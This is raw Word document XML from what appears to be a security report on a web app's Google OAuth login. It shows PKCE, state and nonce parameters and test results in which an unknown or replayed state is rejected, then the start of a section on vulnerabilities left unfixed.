bk9Ww/uI42qRvA6b42F9/tmlH9+bhLS+v5tWLyACTeE/DBf8iA5FZNq7Exsv&#10;Wg3xkfB3L56aqxTEXsMifVIgi1xe4xe/AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEB&#10;AAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9&#10;If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJqo&#10;wRNOBgAAHy8AAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAh&#10;APom9DPdAAAABgEAAA8AAAAAAAAAAAAAAAAAqAgAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAE&#10;APMAAACyCQAAAAA=&#10;">
                <v:shape id="Shape 2743" o:spid="_x0000_s1362" style="position:absolute;width:64801;height:22669;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6480126,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8wxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oTemo22tBrdhCIo0oOorai3R/aZhGbfxuyq6b/vCoUeh5n5hplmnanFlVpXWVYwiGIQ&#10;xLnVFRcKvj7nTyMQziNrrC2Tgh9ykKW9hykm2t54Q9etL0SAsEtQQel9k0jp8pIMusg2xME72dag&#10;D7ItpG7xFuCmlsM4fpUGKw4LJTY0Kyn/3l6MgvHCzdarpbf7usnnu9HH+XhwZ6Ue+937BISnzv+H&#10;/9pLrWD49vIM9zfhCcj0FwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAE2PnzDHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" path="m19050,l6467474,v2527,,4956,484,7290,1439l6480126,5022r,2256882l6474764,2265487v-2334,967,-4763,1451,-7290,1463l19050,2266950v-2526,-12,-4956,-496,-7290,-1463c9426,2264507,7366,2263143,5580,2261357v-1787,-1786,-3163,-3857,-4130,-6177l,2247900,,19050,1450,11745c2417,9401,3793,7342,5580,5569,7366,3770,9426,2394,11760,1439,14094,471,16524,,19050,xe" fillcolor="#102b46" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6480126,2266950"/>
                </v:shape>
                <v:rect id="Rectangle 2747" o:spid="_x0000_s1363" style="position:absolute;left:1007;top:1455;width:2100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33115CFE" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>GET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/auth/google/redirect</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2748" o:spid="_x0000_s1364" style="position:absolute;left:1007;top:3169;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1533323E"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49" o:spid="_x0000_s1365" style="position:absolute;left:2096;top:3169;width:5143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14:paraId="7447C044" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>response_type</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">        = code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Authorization Code, not Implicit)</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2750" o:spid="_x0000_s1366" style="position:absolute;left:1007;top:4884;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14:paraId="65C10968"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51" o:spid="_x0000_s1367" style="position:absolute;left:2096;top:4884;width:3621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0105C6D" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>code_challenge_method</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">= S256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not "plain")</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2752" o:spid="_x0000_s1368" style="position:absolute;left:1007;top:6598;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61F10144"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53" o:spid="_x0000_s1369" style="position:absolute;left:2096;top:6598;width:4925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74E6E3A4" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>code_challenge</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">       = 43 chars   </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">   (</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>correct S256 base64url length)</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2754" o:spid="_x0000_s1370" style="position:absolute;left:1007;top:8313;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288AE082"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55" o:spid="_x0000_s1371" style="position:absolute;left:2096;top:8313;width:2607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3ABCEE0D" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">nonce, state         = 40 </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>chars</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> each</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2756" o:spid="_x0000_s1372" style="position:absolute;left:1007;top:10122;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14:paraId="4EFC92C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57" o:spid="_x0000_s1373" style="position:absolute;left:2096;top:10122;width:2173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505FFD18" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>code_verifier</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> in response?  </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>no</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2758" o:spid="_x0000_s1374" style="position:absolute;left:1007;top:11837;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14:paraId="1EBAFCC7"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59" o:spid="_x0000_s1375" style="position:absolute;left:2096;top:11837;width:2173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7B27F95F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>client_secret</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> in response?  </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>no</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2760" o:spid="_x0000_s1376" style="position:absolute;left:1007;top:15266;width:2173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7AF8CD8D" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>POST /</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>api</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>/auth/google/callback</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2761" o:spid="_x0000_s1377" style="position:absolute;left:1007;top:16980;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37B3726B"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62" o:spid="_x0000_s1378" style="position:absolute;left:2096;top:16980;width:5143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7F330279" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">unknown state           → </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>400  +</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> audit entry </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>auth.google</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>.state_rejected</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2763" o:spid="_x0000_s1379" style="position:absolute;left:1007;top:18695;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18A1B1E8"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64" o:spid="_x0000_s1380" style="position:absolute;left:2096;top:18695;width:4998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4BD0025D" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>valid state, 1st use    → accepted (then 401: deliberately fake code)</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2765" o:spid="_x0000_s1381" style="position:absolute;left:1007;top:20409;width:144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063BE360" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">  </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2766" o:spid="_x0000_s1382" style="position:absolute;left:2096;top:20409;width:3404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7127EEFF" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">same state, 2nd use     → </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>400  ←</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> replay refused</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A2F06E" w14:textId="52795DFA" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00345BB3">
      <w:pPr>
        <w:spacing w:after="559" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32EE62E2" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="0011533D" w:rsidRDefault="008125F0" w:rsidP="00674944">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="24"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011533D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>7. Vulnerabilities not fixed, and why</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E545768" w14:textId="15171697" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00345BB3">
      <w:pPr>
        <w:spacing w:after="224" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04AA32C9" w14:textId="3BB9820C" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="188" w:line="259" w:lineRule="auto"/>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assignment asks for these explicitly. Each was </w:t>
      </w:r>
      <w:r w:rsidR="00674944" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>considered a</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> decision, not an oversight.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106B0231" w14:textId="0F008A84"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0272" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="680725C4" wp14:editId="7540BCD9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1646932</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-18821</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1524000" cy="571500"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="29759" name="Group 29759"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1524000" cy="571500"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1524000" cy="571500"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2771" name="Shape 2771"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="942975" y="0"/>
                            <a:ext cx="581025" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574131" y="0"/>
                                  <a:pt x="576376" y="918"/>
                                  <a:pt x="578235" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4638"/>
                                  <a:pt x="581025" y="6883"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="126454"/>
                                  <a:pt x="580095" y="128699"/>
                                  <a:pt x="578235" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576376" y="132420"/>
                                  <a:pt x="574131" y="133350"/>
                                  <a:pt x="571500" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6883"/>
                                  <a:pt x="930" y="4638"/>
                                  <a:pt x="2790" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="4650" y="918"/>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775" name="Shape 2775"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="171450"/>
                            <a:ext cx="581025" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="930"/>
                                  <a:pt x="578235" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4638"/>
                                  <a:pt x="581025" y="6896"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="135967"/>
                                  <a:pt x="580095" y="138224"/>
                                  <a:pt x="578235" y="140060"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="141920"/>
                                  <a:pt x="574130" y="142850"/>
                                  <a:pt x="571500" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142850"/>
                                  <a:pt x="4650" y="141920"/>
                                  <a:pt x="2790" y="140060"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135967"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>
                                  <a:pt x="930" y="4638"/>
                                  <a:pt x="2790" y="2778"/>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780" name="Shape 2780"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1152524" y="438150"/>
                            <a:ext cx="285750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2766"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4626"/>
                                  <a:pt x="285750" y="6883"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="126442"/>
                                  <a:pt x="284820" y="128674"/>
                                  <a:pt x="282960" y="130535"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="132395"/>
                                  <a:pt x="278855" y="133325"/>
                                  <a:pt x="276225" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133325"/>
                                  <a:pt x="4650" y="132395"/>
                                  <a:pt x="2790" y="130535"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128674"/>
                                  <a:pt x="0" y="126442"/>
